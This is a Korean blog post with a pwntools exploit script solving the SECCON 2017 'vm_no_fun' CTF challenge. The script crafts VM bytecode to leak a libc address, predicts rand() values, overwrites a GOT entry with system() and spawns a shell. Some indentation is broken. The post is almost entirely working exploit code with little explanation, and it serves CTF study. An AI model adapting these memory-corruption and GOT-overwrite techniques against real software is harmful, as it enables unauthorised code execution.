SECCON 2017 vm_no_fun

Pwnable/CTF 2018. 8. 15. 11:44
VM 공부할겸 풀어봄 ㅎ
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
from pwn import *
from ctypes import *
 
p = process('./inception')
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(0x31337)
 
def parse_vm(op,arg0,arg1,arg2):
    payload = p8(op)
    payload += '\x02'
    payload += p8(0x20) #type
    payload += p8(arg0) #regi_idx
    payload += '\x00'
    payload += p8(0x21) #type
    payload += p8(arg1) #regi_idx |
    payload += p8(arg2) #regi_idx >>
    return payload
 
def read_str(data):
    p.send(p32(len(data)))
    sleep(0.5)
    p.send(data)
 
def input_vm1(ins):
    p.send('\x01')
    p.recvline()
    read_str(ins)
def vm1_setread():
    return '\x0c\x00\xf4\x00'
 
def vm1_setwrite():
    return '\x0b\x00\xf4\x00'
 
def parse_vm2(op,arg1,arg5,arg6,arg10):
    arg4 = p8(0)
    arg3 = p8(arg1 / 0x10000)
    arg2 = p8((arg1 % 0x10000)/0x100)
    arg1 = p8((arg1 % 0x100))
 
    arg9 = p8(0)
    arg8 = p8(arg6 / 0x10000)
    arg7 = p8((arg6 % 0x10000)/0x100)
    arg6 = p8((arg6 % 0x100))
 
    payload = p8(op) + arg1 + arg2 + arg3 + arg4 + p8(arg5)
    payload += arg6 + arg7 + arg8 + arg9 + p8(arg10)
    return payload
 
def input_vm2(payload):
    read_str(payload)
    sleep(2)
    p.send('\x02')
 
def parse_vm3(op,arg0,arg1,arg3):
    arg0 = (arg0 >> 8)
    payload = p8(op) + p8(arg0)
    arg2  = (arg1>>8)
    arg1 -= arg2
    payload += p8(arg1) + p8(arg2)
    arg4 = (arg3>>8)
    arg3 -= arg4
    payload += p8(arg3) + p8(arg4)
    return payload
 
print p.recvline()
 
set_ = parse_vm(0x89,0x7,0x0,0x6) #mov
input_vm1(set_+vm1_setread())
read_str('/bin/sh\x00'*0x10) #FUCK ..
 
set_ = parse_vm(0x89,0x7,0x0,0x6) #mov
set_ += parse_vm(0x89,0x0,0x10,0x0) #mov write_len_set
input_vm1(set_+vm1_setread())
sleep(1)
payload = parse_vm2(0xb4,0x1,0x20,0x900,0x21) #reg[1] = 0
payload += parse_vm2(0x28,0xa,0x20,0x700,0x21) #reg[0xa] = 0x700
payload += parse_vm2(0xb4,0x9,0x20,0x7000,0x21) #reg[9] = 0
payload += parse_vm2(0xb4,0x9,0x20,0x100e0,0x21) #reg[9] = -0x100e0 #puts@got idx
payload += parse_vm2(0x28,0xb,0x20,0x10,0x21) #unk_225138 cpy_len arg = 0x10
payload += parse_vm2(0x20,0x8,0x22,0x1,0x20) #pop
payload += parse_vm2(0x20,0xc,0x22,0x1,0x20) #pop
payload += parse_vm2(0x85,0x01,0x20,0x1,0x21) #cpy flag_set
payload += parse_vm2(0x83,0x01,0x20,0x1,0x21) #return 0
sleep(1)
input_vm2(payload)
set_ = parse_vm(0x1,0x7,0x0,0x2)
input_vm1(set_+vm1_setwrite())
p.recvuntil('A')
print p.recv(1024)
print p.recv(20).encode('hex')
puts = u64(p.recv(8))
libc_base = puts - 0x6f690
memcpy = libc_base + 0x14dea0
system = libc_base + 0x45390
count = [0]*3
target = [0]*3
target[0] = ((system&0xff))
target[1] = ((system&0xff00)>>8)
target[2] = ((system&0xff0000)>>16)
sort = []
for i in range(0,0x10000):
    if(len(sort)<3):
            random = libc.rand()&0xff #byte
            if(target[0]==random and count[0]<1):
            count[0] = i
            print 'FIND {}'.format(target[0])
            sleep(3)
            sort.append(0)
        if(target[1]==random and count[1]<1):
            count[1] = i
                        print 'FIND {}'.format(target[1])
                        sleep(3)
            sort.append(1)
        if(target[2]==random and count[2]<1):
            count[2] = i
                        print 'FIND {}'.format(target[2])
                        sleep(3)
            sort.append(2)
    else:
        break
print hex(memcpy)
print hex(system)
print 'target > {}'.format(target)
print 'randCount > {}'.format(count)
print 'Sort > {}'.format(sort)
 
 
p.recv(1024)
gdb.attach(p)
 
set_ = parse_vm(0x89,0x7,0,0x6)
input_vm1(set_+vm1_setread())
payload = parse_vm2(0x28,0x7,0x20,(0x700-0x30),0x21)
payload += parse_vm2(0xdb,0x1,0x20,0x1,0x21)
payload += parse_vm2(0x83,0x1,0x20,0x1,0x21)
payload += 'A'*15+'B'*0x2d0+'/bin/sh\x00'
input_vm2(payload)
 
set_ = parse_vm(0x89,0x7,0,0x6)
input_vm1(set_+vm1_setread())
payload = parse_vm2(0x28,0x7,0x20,0x5f0,0x21)
payload += parse_vm2(0xdb,0x01,0x20,0x1,0x21)
payload += parse_vm2(0x83,0x01,0x20,0x1,0x21)
payload += '\x83'*(0x100-len(payload))
 
vm3_p = parse_vm3(0x1,0x6500,0x3,0x0)
 
 
for i in range(3):
    if(i == 0):
        target = (count[sort[i]] + 0x1)
    else:
    
        target = (count[sort[i]] - count[sort[i-1]])
    vm3_p += parse_vm3(0x1,0x6500,0xb,0x0)
    vm3_p += parse_vm3(0x3,0x6500,0xb,(0x58-sort[i]))
    for i in range(target):
        vm3_p += parse_vm3(0x15,0x6500,0x1,0x1)
 
vm3_p += parse_vm3(0xc,0x6500,0x1,0x1) #call system('/bin/sh')
vm3_p += parse_vm3(0xb,0x6500,0x1,0x1) #return 0
 
payload += vm3_p
print len(payload)
input_vm2(payload)
p.recv(1024)
p.send('\x03')
###VM3 GOT -> SYSTEM ###
 
 
 
 
p.interactive()
 
Colored by Color Scripter
cs
저작자표시
'Pwnable > CTF' 카테고리의 다른 글

PCTF 2017 Chakrazy (0)	2018.12.25
PCTF 2018 d8-dist (0)	2018.12.22
Codegate 2018 7ameBOX1 (0)	2018.05.21
RCTF 2018 Write up (2)	2018.05.21
Secuinside 2017 vvv (0)	2018.05.13
ABOUT ME

HSr00t HSr00t

'Pwnable > CTF' 카테고리의 다른 글

티스토리툴바

ABOUT ME

'Pwnable > CTF' 카테고리의 다른 글

관련글 관련글 더보기

티스토리툴바
